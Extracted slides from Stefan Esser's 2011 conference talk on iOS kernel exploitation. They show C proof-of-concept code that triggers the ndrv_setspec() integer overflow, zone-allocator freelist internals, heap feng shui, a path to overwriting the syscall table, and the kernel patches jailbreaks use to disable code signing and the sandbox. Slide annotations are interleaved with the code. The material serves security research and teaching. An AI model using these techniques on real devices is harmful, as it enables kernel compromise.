44. ndrv_setspec() Integer Overflow Vulnerability
if (error == 0)
{
/* At this point, we've at least got enough bytes to start looking around */
u_int32_t demuxOn = 0;
because of
proto_param.demux_count = ndrvSpec.demux_count; high demux_count
this loop loops
proto_param.input = ndrv_input;
very often
proto_param.event = ndrv_event;
for (demuxOn = 0; demuxOn < ndrvSpec.demux_count; demuxOn++)
{
/* Convert an ndrv_demux_desc to a ifnet_demux_desc */
error = ndrv_to_ifnet_demux(&ndrvSpec.demux_list[demuxOn],
&proto_param.demux_array[demuxOn]);
if (error)
break; we need to be able function converts
} to set error into different
} at some point data format
to stop overflowing lets us overflow !!!
Stefan Esser • iOS Kernel Exploitation • August 2011 • 44
45. ndrv_setspec() Integer Overflow Vulnerability
int
ndrv_to_ifnet_demux(struct ndrv_demux_desc* ndrv, struct ifnet_demux_desc* ifdemux)
{
bzero(ifdemux, sizeof(*ifdemux));
if (ndrv->type < DLIL_DESC_ETYPE2)
{
/* using old "type", not supported */
return ENOTSUP;
} user input can
create these
if (ndrv->length > 28) errors easily
{
return EINVAL;
} writes into
too small buffer
ifdemux->type = ndrv->type;
ifdemux->data = ndrv->data.other;
ifdemux->datalen = ndrv->length; limited in what
can be written
return 0; BUT IT WRITES A POINTER !!!
}
Stefan Esser • iOS Kernel Exploitation • August 2011 • 45
46. Triggering Code (no crash!)
struct sockaddr_ndrv ndrv; int s, i;
struct ndrv_protocol_desc ndrvSpec; char demux_list_buffer[15 * 32];
s = socket(AF_NDRV, SOCK_RAW, 0);
if (s < 0) {
example most
// ...
probably does
}
not crash due
strlcpy((char *)ndrv.snd_name, "lo0", sizeof(ndrv.snd_name));
to checks inside
ndrv.snd_len = sizeof(ndrv);
ndrv_to_ifnet_demux
ndrv.snd_family = AF_NDRV;
if (bind(s, (struct sockaddr *)&ndrv, sizeof(ndrv)) < 0) {
// ...
}
memset(demux_list_buffer, 0x55, sizeof(demux_list_buffer));
for (i = 0; i < 15; i++) {
/* fill type with a high value */
demux_list_buffer[0x00 + i*32] = 0xFF;
demux_list_buffer[0x01 + i*32] = 0xFF;
/* fill length with a small value < 28 */
demux_list_buffer[0x02 + i*32] = 0x04; high demux_count
demux_list_buffer[0x03 + i*32] = 0x00; triggers
} integer overflow
ndrvSpec.version = 1; ndrvSpec.protocol_family = 0x1234;
ndrvSpec.demux_count = 0x4000000a; ndrvSpec.demux_list = &demux_list_buffer;
setsockopt(s, SOL_NDRVPROTO, NDRV_SETDMXSPEC, &ndrvSpec, sizeof(struct ndrv_protocol_desc));
Stefan Esser • iOS Kernel Exploitation • August 2011 • 46
47. MALLOC() and Heap Buffer Overflows
• the vulnerable code uses MALLOC() to allocate memory
• MALLOC() is a macro that calls _MALLOC()
• _MALLOC() is a wrapper around kalloc() that adds a short header (allocsize)
• kalloc() is also a wrapper that uses
• kmem_alloc() for large blocks of memory
• zalloc() for small blocks of memory
➡ we only concentrate on zalloc() because it is the only relevant allocator here
Stefan Esser • iOS Kernel Exploitation • August 2011 • 47
48. Zone Allocator - zalloc()
struct zone {
int count; /* Number of elements used now */
vm_offset_t free_elements;
decl_lck_mtx_data(,lock) /* zone lock */
• zalloc() allocates memory in so lck_mtx_ext_t
lck_attr_t
lock_ext; /* placeholder for indirect mutex */
lock_attr; /* zone lock attribute */
called zones lck_grp_t lock_grp; /* zone lock group */
lck_grp_attr_t lock_grp_attr; /* zone lock group attribute */
vm_size_t cur_size; /* current memory utilization */
• each zone is described by a zone vm_size_t max_size; /* how large can this zone grow */
vm_size_t elem_size; /* size of an element */
struct and has a zone name vm_size_t alloc_size; /* size used for more memory */
unsigned int
• a zone consists of a number of /* boolean_t */ exhaustible :1, /* (F) merely return if empty? *
/* boolean_t */ collectable :1, /* (F) garbage collect empty pag
memory pages /* boolean_t */ expandable :1, /* (T) expand zone (with message
/* boolean_t */ allows_foreign :1,/* (F) allow non-zalloc space
/* boolean_t */ doing_alloc :1, /* is zone expanding now? */
• each allocated block inside a /* boolean_t */ waiting :1, /* is thread waiting for expansion?
/* boolean_t */ async_pending :1, /* asynchronous allocation p
zone is of the same size /* boolean_t */ doing_gc :1, /* garbage collect in progress?
/* boolean_t */ noencrypt :1;
• free elements are stored in struct zone *
call_entry_data_t
next_zone; /* Link for all-zones list */
call_async_alloc; /* callout for asynchron
a linked list const char *zone_name; /* a name for the zone */
#if ZONE_DEBUG
queue_head_t active_zones; /* active elements */
#endif /* ZONE_DEBUG */
};
Stefan Esser • iOS Kernel Exploitation • August 2011 • 48
49. Zone Allocator - Zones
$ zprint
elem cur max cur max cur alloc alloc
zone name size size size #elts #elts inuse size count
-------------------------------------------------------------------------------
zones 388 51K 52K 136 137 122 8K 21
vm.objects 148 14904K 19683K 103125 136185101049 8K 55 C
vm.object.hash.entries 20 1737K 2592K 88944 132710 79791 4K 204 C
maps 164 20K 40K 125 249 109 16K 99
non-kernel.map.entries 44 1314K 1536K 30597 35746 28664 4K 93 C
kernel.map.entries 44 10903K 10904K 253765 253765 2407 4K 93
map.copies 52 7K 16K 157 315 0 8K 157 C
pmap 116 15K 48K 140 423 99 4K 35 C
pv_list 28 3457K 4715K 126436 172460126400 4K 146 C
pdpt 64 0K 28K 0 448 0 4K 64 C
kalloc.16 16 516K 615K 33024 39366 32688 4K 256 C
kalloc.32 32 2308K 3280K 73856 104976 71682 4K 128 C
kalloc.64 64 3736K 4374K 59776 69984 58075 4K 64 C
kalloc.128 128 3512K 3888K 28096 31104 27403 4K 32 C
kalloc.256 256 6392K 7776K 25568 31104 21476 4K 16 C
kalloc.512 512 1876K 2592K 3752 5184 3431 4K 8 C
kalloc.1024 1024 728K 1024K 728 1024 673 4K 4 C
kalloc.2048 2048 8504K 10368K 4252 5184 4232 4K 2 C
kalloc.4096 4096 2584K 4096K 646 1024 626 4K 1 C
kalloc.8192 8192 2296K 32768K 287 4096 276 8K 1 C
...
Stefan Esser • iOS Kernel Exploitation • August 2011 • 49
50. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
0
• when a zone is created or later grown it
starts with no memory and an empty freelist
• first new memory is allocated
(usually a 4k page)
• it is split into the zone‘s element size
• each element is added to the freelist
• elements in freelist are in reverse order
Stefan Esser • iOS Kernel Exploitation • August 2011 • 50
51. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
0
• when a zone is created or later grown it
starts with no memory and an empty freelist
• first new memory is allocated
(usually a 4k page)
• it is split into the zone‘s element size
• each element is added to the freelist
• elements in freelist are in reverse order
Stefan Esser • iOS Kernel Exploitation • August 2011 • 51
52. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
0
• when a zone is created or later grown it
starts with no memory and an empty freelist
• first new memory is allocated
(usually a 4k page)
• it is split into the zone‘s element size
• each element is added to the freelist
• elements in freelist are in reverse order
Stefan Esser • iOS Kernel Exploitation • August 2011 • 52
53. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
1
1
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
• first new memory is allocated
(usually a 4k page)
• it is split into the zone‘s element size
• each element is added to the freelist
• elements in freelist are in reverse order
Stefan Esser • iOS Kernel Exploitation • August 2011 • 53
54. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
2
2
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
2
1
• first new memory is allocated
(usually a 4k page)
• it is split into the zone‘s element size
• each element is added to the freelist
• elements in freelist are in reverse order
Stefan Esser • iOS Kernel Exploitation • August 2011 • 54
55. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
3
3
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
2
2
• first new memory is allocated 3
(usually a 4k page)
• it is split into the zone‘s element size 1
• each element is added to the freelist
• elements in freelist are in reverse order
Stefan Esser • iOS Kernel Exploitation • August 2011 • 55
56. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
4
4
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
2
3
• first new memory is allocated 3
(usually a 4k page) 4
• it is split into the zone‘s element size 2
• each element is added to the freelist
• elements in freelist are in reverse order 1
Stefan Esser • iOS Kernel Exploitation • August 2011 • 56
57. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
5
5
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
2
4
• first new memory is allocated 3
(usually a 4k page) 4
5
• it is split into the zone‘s element size 3
• each element is added to the freelist
• elements in freelist are in reverse order 2
1
Stefan Esser • iOS Kernel Exploitation • August 2011 • 57
58. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
6
6
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
2
5
• first new memory is allocated 3
(usually a 4k page) 4
5
• it is split into the zone‘s element size 4
6
• each element is added to the freelist
• elements in freelist are in reverse order 3
1 2
Stefan Esser • iOS Kernel Exploitation • August 2011 • 58
59. Zone Allocator - Adding New Memory
MY_ZONE
head of freelist
7
7
• when a zone is created or later grown it
1
starts with no memory and an empty freelist
2
6
• first new memory is allocated 3
(usually a 4k page) 4
5
• it is split into the zone‘s element size 5
6
• each element is added to the freelist 7
• elements in freelist are in reverse order 4
1 2 3
Stefan Esser • iOS Kernel Exploitation • August 2011 • 59
60. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
7
7
1
2
6
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 5
to the freelist 6
7
4
1 2 3
Stefan Esser • iOS Kernel Exploitation • August 2011 • 60
61. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
6
6
1
2
5
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 4
to the freelist 6
7
3
1 2
Stefan Esser • iOS Kernel Exploitation • August 2011 • 61
62. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
5
5
1
2
4
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 3
to the freelist 6
7
2
1
Stefan Esser • iOS Kernel Exploitation • August 2011 • 62
63. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
4
4
1
2
3
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 2
to the freelist 6
7
1
Stefan Esser • iOS Kernel Exploitation • August 2011 • 63
64. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
3
3
1
2
2
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 1
to the freelist 6
7
Stefan Esser • iOS Kernel Exploitation • August 2011 • 64
65. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
5
5
1
2
3
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 2
to the freelist 6
7
1
Stefan Esser • iOS Kernel Exploitation • August 2011 • 65
66. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
7
7
1
2
5
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 3
to the freelist 6
7
2
1
Stefan Esser • iOS Kernel Exploitation • August 2011 • 66
67. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
6
6
1
2
7
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 5
to the freelist 6
7
3
1 2
Stefan Esser • iOS Kernel Exploitation • August 2011 • 67
68. Zone Allocator - Allocating and Freeing Memory
MY_ZONE
head of freelist
4
4
1
2
6
• when memory blocks are allocated they 3
are removed from the freelist 4
5
• when they are freed they are returned 7
to the freelist 6
7
5
1 2 3
Stefan Esser • iOS Kernel Exploitation • August 2011 • 68
69. Zone Allocator Freelist
• freelist is as single linked list
• zone struct points to head of freelist
• the freelist is stored inbound
• first 4 bytes of a free block point to
next block on freelist
Stefan Esser • iOS Kernel Exploitation • August 2011 • 69
70. Zone Allocator Freelist - Removing Element
#define REMOVE_FROM_ZONE(zone, ret, type) head of freelist
MACRO_BEGIN will be returned
(ret) = (type) (zone)->free_elements;
if ((ret) != (type) 0) {
if (check_freed_element) {
if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0]) ||
((zone)->elem_size >= (2 * sizeof(vm_offset_t)) &&
((vm_offset_t *)(ret))[((zone)->elem_size/sizeof(vm_offset_t))-1] !=
((vm_offset_t *)(ret))[0]))
panic("a freed zone element has been modified");
if (zfree_clear) {
unsigned int ii;
for (ii = sizeof(vm_offset_t) / sizeof(uint32_t);
ii < zone->elem_size/sizeof(uint32_t) - sizeof(vm_offset_t) / sizeof(uint32_t);
ii++)
if (((uint32_t *)(ret))[ii] != (uint32_t)0xdeadbeef)
panic("a freed zone element has been modified");
}
}
new head of freelist is
(zone)->count++;
read from previous head
(zone)->free_elements = *((vm_offset_t *)(ret));
}
MACRO_END
grey code is only activated by debugging boot-args
Apple seems to think about activating it by default
Stefan Esser • iOS Kernel Exploitation • August 2011 • 70
71. Zone Allocator Freelist - Adding Element
#define ADD_TO_ZONE(zone, element)
MACRO_BEGIN
if (zfree_clear)
{ unsigned int i;
for (i=0;
i < zone->elem_size/sizeof(uint32_t);
i++)
((uint32_t *)(element))[i] = 0xdeadbeef; current head of freelist
} is written to start of free block
*((vm_offset_t *)(element)) = (zone)->free_elements;
if (check_freed_element) {
if ((zone)->elem_size >= (2 * sizeof(vm_offset_t)))
((vm_offset_t *)(element))[((zone)->elem_size/sizeof(vm_offset_t))-1] =
(zone)->free_elements;
}
(zone)->free_elements = (vm_offset_t) (element);
(zone)->count--; free block is made
MACRO_END the head of the freelist
grey code is only activated by debugging boot-args
Apple seems to think about activating it by default
Stefan Esser • iOS Kernel Exploitation • August 2011 • 71
72. Exploiting Heap Overflows in Zone Memory
attacking “application“ data
• carefully crafting allocations / deallocations
• interesting kernel data structure is allocated behind overflowing block
• impact and further exploitation depends on the overwritten data structure
➡ this is the way to go if Apple adds some mitigations in the future
Stefan Esser • iOS Kernel Exploitation • August 2011 • 72
73. Exploiting Heap Overflows in Zone Memory
attacking inbound freelist of zone allocator
• carefully crafting allocations / deallocations
• free block is behind overflowing block
• overflow allows to control next pointer in freelist
• when this free block is used head of freelist is controlled
• next allocation will return attacker supplied memory address
• we can write any data anywhere
Stefan Esser • iOS Kernel Exploitation • August 2011 • 73
74. Kernel Heap Manipulation
• we need heap manipulation primitives
• allocation of a block of specific size
• deallocation of a block
• for our demo vulnerability this is easy
• allocation of kernel heap by connecting to a ndrv socket
• length of socket name controls size of allocated heap block
• deallocation of kernel heap by closing a socket
Stefan Esser • iOS Kernel Exploitation • August 2011 • 74
75. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 75
76. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 76
77. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 77
78. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 78
79. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 79
80. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 80
81. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 81
82. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 82
83. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 83
84. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 84
85. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 85
86. Kernel Heap Feng Shui
Heap Feng Shui
• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled
Stefan Esser • iOS Kernel Exploitation • August 2011 • 86
87. Current Heap State - A Gift by iOS
/*
* Returns information about the memory allocation zones.
* Supported in all kernels..
• technique does work without */
knowing the heap state routine host_zone_info(
host : host_t;
out names : zone_name_array_t,
• heap filling is just repeated Dealloc;
often enough out info : zone_info_array_t,
Dealloc);
• but how often is enough?
• iOS has a gift for us: typedef struct zone_info {
integer_t zi_count; /* Number of elements used now */
host_zone_info() mach call vm_size_t zi_cur_size; /* current memory utilization */
vm_size_t zi_max_size; /* how large can this zone grow */
• call makes number of holes in vm_size_t
vm_size_t
zi_elem_size; /* size of an element */
zi_alloc_size; /* size used for more memory */
kernel zone available to user integer_t zi_pageable; /* zone pageable? */
integer_t zi_sleepable; /* sleep if empty? */
integer_t zi_exhaustible; /* merely return if empty? */
integer_t zi_collectable; /* garbage collect elements? */
} zone_info_t;
Stefan Esser • iOS Kernel Exploitation • August 2011 • 87
88. From Heap Overflow to Code Execution
• in the iOS 4.3.1-4.3.3 untether exploit a free memory block is overwritten
• ndrv_to_ifnet_demux() writes a pointer to memory we control
• next allocation will put this pointer to our fake free block on top of freelist
• next allocation will put the pointer inside the fake free block on top of freelist
• next allocation will return the pointer from the fake free block
• this pointer points right in the middle of the syscall table
• application data written into it allows to replace the syscall handlers
Stefan Esser • iOS Kernel Exploitation • August 2011 • 88
90. What do Jailbreaks patch?
• repair any kernel memory corruption caused by exploit
• disable security features of iOS in order to jailbreak
• exact patches depend on the group releasing the jailbreak
• most groups rely on a list of patches generated by comex
➡ https://github.com/comex/datautils0/blob/master/make_kernel_patchfile.c
Stefan Esser • iOS Kernel Exploitation • August 2011 • 90
91. Restrictions and Code Signing
proc_enforce
• sysctl variable controlling different process management enforcements
• disabled allows debugging and execution of wrongly signed binaries
• nowadays write protected from “root“
cs_enforcement_disable
• boot-arg that disables codesigning enforcement
• enabled allows to get around codesigning
Stefan Esser • iOS Kernel Exploitation • August 2011 • 91
92. PE_i_can_has_debugger
variable
patched to 1
* AMFI will allow non signed binaries
* disables various checks
* used inside the kernel debugger
* in older jailbreaks replaced by RETURN(1)
Stefan Esser • iOS Kernel Exploitation • August 2011 • 92
93. vm_map_enter
replaced with NOP
* vm_map_enter disallows pages with both
VM_PROT_WRITE and VM_PROT_EXECUTE
* when found VM_PROT_EXECUTE is cleared
* patch just NOPs out the check
Stefan Esser • iOS Kernel Exploitation • August 2011 • 93
94. vm_map_protect
replaced with NOP
* vm_map_protect disallows pages with both
VM_PROT_WRITE and VM_PROT_EXECUTE
* when found VM_PROT_EXECUTE is cleared
* patch NOPs out the bit clearing
Stefan Esser • iOS Kernel Exploitation • August 2011 • 94
95. AMFI Binary Trust Cache Patch
replaced with
MOV R0, 1
BX LR
* disables the AMFI binary trust cache
* replacing the function with a return(1);
Stefan Esser • iOS Kernel Exploitation • August 2011 • 95
96. Patching the Sandbox
function is hooked
so that a new sb_evaluate() is used
* fixes the sandbox problems caused by moving files
* access outside /private/var/mobile is allowed
* access to /private/var/mobile/Library/Preferences/com.apple
is going through original evaluation
* access to other subdirs of /private/var/movile/Library/Preferences is granted
* everything else goes through original checks
for further info see https://github.com/comex/datautils0/blob/master/sandbox.S
Stefan Esser • iOS Kernel Exploitation • August 2011 • 96